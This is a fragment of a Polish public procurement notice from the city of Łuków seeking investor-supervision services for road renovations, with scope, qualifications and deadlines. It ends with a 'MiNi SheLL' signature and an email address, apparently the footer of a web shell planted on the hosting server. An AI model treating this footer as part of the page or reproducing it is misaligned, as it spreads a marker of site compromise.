określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 6.3.	Część 3 Nazwa: Pełnienie nadzoru inwestorskiego w ramach zadania Remont dróg gminnych nr 114382l ul. Dmocha, nr 102413l ul. Kościelna m. Łuków.<br/>6.3.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu nadzoru inwestorskiego przez zespół osób posiadających uprawnienia budowlane (wymagane ustawą z dnia 7 lipca 1994 Prawo Budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów) do pełnienia samodzielnej funkcji technicznej w budownictwie w branży drogowej, specjalność inżynieryjna – drogowa.<br/>6.3.2.	Przedmiot zamówienia dotyczy pełnienia nadzoru inwestorskiego nad wykonaniem robót budowlanych realizowanych w oparciu o projekt techniczny zatwierdzony zgłoszeniem Nr B.6743.652.2021.EM z dnia 20.08.2021 r. stanowiących remont dróg gminnych nr 114382L ul. Dmocha, nr 102413L ul. Kościelna w m. Łuków.<br/>6.3.3.	W ramach określonego przedmiotu Zamówienia do obowiązków uprawnionej osoby pełniącej funkcje inspektora nadzoru w stosownej specjalności budowlanej należy:<br/>	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji <br/>z projektem oraz przepisami i zasadami wiedzy technicznej,<br/>	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, <br/>a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych <br/>	i niedopuszczonych do stosowania w budownictwie,<br/>	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,<br/>	uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania,<br/>	potwierdzenie faktyczne wykonanych robót oraz usunięcia wad, a także na żądanie inwestora kontrolowanie rozliczeń budowy,<br/>	uczestniczenie w radach budowy odbywających się nie rzadziej jak dwa razy w miesiącu,<br/>	uczestniczenie w przeglądach gwarancyjnych oraz w naradach i konsultacjach w przypadku wystąpienia usterek lub wad stwierdzonych w przedmiotowym zakresie wykonanych robót budowlanych.<br/>6.3.4.	Szczegółowy zakres rzeczowy realizacji robót budowlanych dla w/w zakresu obejmuje remont dróg gminnych długości 587,19 m i szerokości jezdni 6,2-6,6 m w zakresie:<br/>	robót przygotowawczych i rozbiórkowych (m.in. rozebranie krawężników betonowych, ław betonowych, kostki brukarskiej oraz frezowanie, oczyszczenie i skropienie nawierzchni bitumicznej);<br/>	wykonanie podbudowy po remoncie kanału deszczowego;<br/>	wykonanie ławy betonowej z oporem pod krawężniki;<br/>	ustawienie krawężników betonowych (prosty, najazdowy, przejściowy) na ławie betonowej z oporem;<br/>	wykonania nawierzchni zjazdów do posesji o zmiennej szerokości o nawierzchni z kostki brukowej gr. 8cm na podsypce cem. – piaskowej gr. 4cm <br/>	wykonanie nawierzchni chodników z kostki rozbiórkowej o gr. 6cm na podsypce cem. – piaskowej gr. 4cm regulacja wysokościowa chodników z istniejących elementów ulicznych;<br/>	wykonanie nawierzchni chodników z kostki brukowej o gr. 6 cm na podsypce cem. – piaskowej gr. 4cm zgodnie ze sztuką budowlaną;<br/>	wykonanie wyniesionego przejścia dla pieszych z kostki brukowej gr. 8 cm na podbudowie;<br/>	wykonanie odwodnienia powierzchniowego drogi poprzez zastosowanie odpowiednich spadków podłużnych i poprzecznych;<br/>	wykonanie nawierzchni bitumicznej z mieszanek mineralno – bitumicznych asfaltowych, stanowiącej warstwę wyrównawczą grubości średnio 3,0 cm + warstwa ścieralna gr. 4,0cm;<br/>	wymiana i regulacja wpustów ulicznych i włazów kanalizacyjnych i sanitarnych;<br/>	regulacja studzienek telefonicznych, gazowych, wodociągowych;<br/>	wykonanie oznakowania poziomego i pionowego;<br/>	wykonanie projektu tymczasowej organizacji ruchu oraz jego zastosowanie;<br/>	wykonanie i montaż tablicy informacyjnej (2 szt.) o dofinansowaniu ze środków Rządowego Funduszu Rozwoju Dróg wg przekazanego projektu.<br/>6.3.5.	Wartość szacunkowa wykonania robót budowlanych (netto) określona na podstawie kosztorysu w postępowaniu przetargowym na wykonanie robót przedmiotowego zadania wynosi łącznie: 1 511 027,45 zł (brutto).<br/>6.3.6.	Kompletna dokumentacja techniczna dla zakresu realizacji przedsięwzięcia objętego przedmiotem pełnienia nadzoru inwestorskiego dostępna jest na stronie urzędu Miasta Łuków pod linkiem: https://portal.smartpzp.pl/um.lukow </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 14127,49 </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru inwestorskiego branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 14.1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>14.1.1.	nie podlegają wykluczeniu,<br/>14.1.2.	spełniają warunki udziału w postępowaniu.<br/>14.2.	Zamawiający wymaga wykazania przez wykonawców spełnienia warunków określonych w art. 112 ust. 2 ustawy Pzp, dotyczących:<br/>14.2.1.	zdolności do występowania w obrocie gospodarczym:<br/>zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.3.	sytuacji ekonomicznej lub finansowej:<br/>zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.4.	zdolności technicznej lub zawodowej:<br/>O uzyskanie zamówienia mogą ubiegać się Wykonawcy dysponujący przynajmniej:<br/>Część 1 Nazwa: Pełnienie nadzoru inwestorskiego w ramach zadania Budowa infrastruktury na terenie inwestycyjnym przy ul. Strzelniczej w mieście Łuków<br/>	jedną osobą, która będzie pełnić funkcję inspektora nadzoru. Wskazana osoba, która będzie pełnić funkcję inspektora nadzoru w branży drogowej winna posiadać uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadać doświadczenie w pełnieniu w ciągu ostatnich 7 lat funkcji kierownika budowy lub inspektora nadzoru budowlanego budowy, przebudowy, remontu drogi, ulicy klasy min L.<br/>	jedną osobę do pełnienia funkcji inspektora nadzoru robót elektrycznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych nadane na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane.<br/>	jedną osobę do pełnienia funkcji inspektora nadzoru robót sanitarnych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych nadane na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane.<br/>Część 2 Nazwa: Pełnienie nadzoru inwestorskiego w ramach zadania Remont dróg gminnych nr 102488L ul. Spokojna, nr 102371L ul. Cmentarna w m. Łuków<br/>	jedną osobą, która będzie pełnić funkcję inspektora nadzoru. Wskazana osoba, która będzie pełnić funkcję inspektora nadzoru w branży drogowej winna posiadać uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadać doświadczenie w pełnieniu w ciągu ostatnich 7 lat funkcji kierownika budowy lub inspektora nadzoru budowlanego budowy, przebudowy, remontu drogi, ulicy klasy min L.<br/>Część 3 Nazwa: Pełnienie nadzoru inwestorskiego w ramach zadania Remont dróg gminnych nr 114382l ul. Dmocha, nr 102413l ul. Kościelna m. Łuków<br/>	jedną osobą, która będzie pełnić funkcję inspektora nadzoru. Wskazana osoba, która będzie pełnić funkcję inspektora nadzoru w branży drogowej winna posiadać uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadać doświadczenie w pełnieniu w ciągu ostatnich 7 lat funkcji kierownika budowy lub inspektora nadzoru budowlanego budowy, przebudowy, remontu drogi, ulicy klasy min L. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">16.3.	W celu potwierdzenia spełniania warunków udziału w postępowaniu zamawiający będzie żądał poniższych środków dowodowych:<br/>a)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami -załącznik nr 6 do SWZ.<br/>b)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp - załącznik nr 7 do SWZ,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały przewidziane w projekcie umowy stanowiącym tom II do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/um.lukow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-20 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com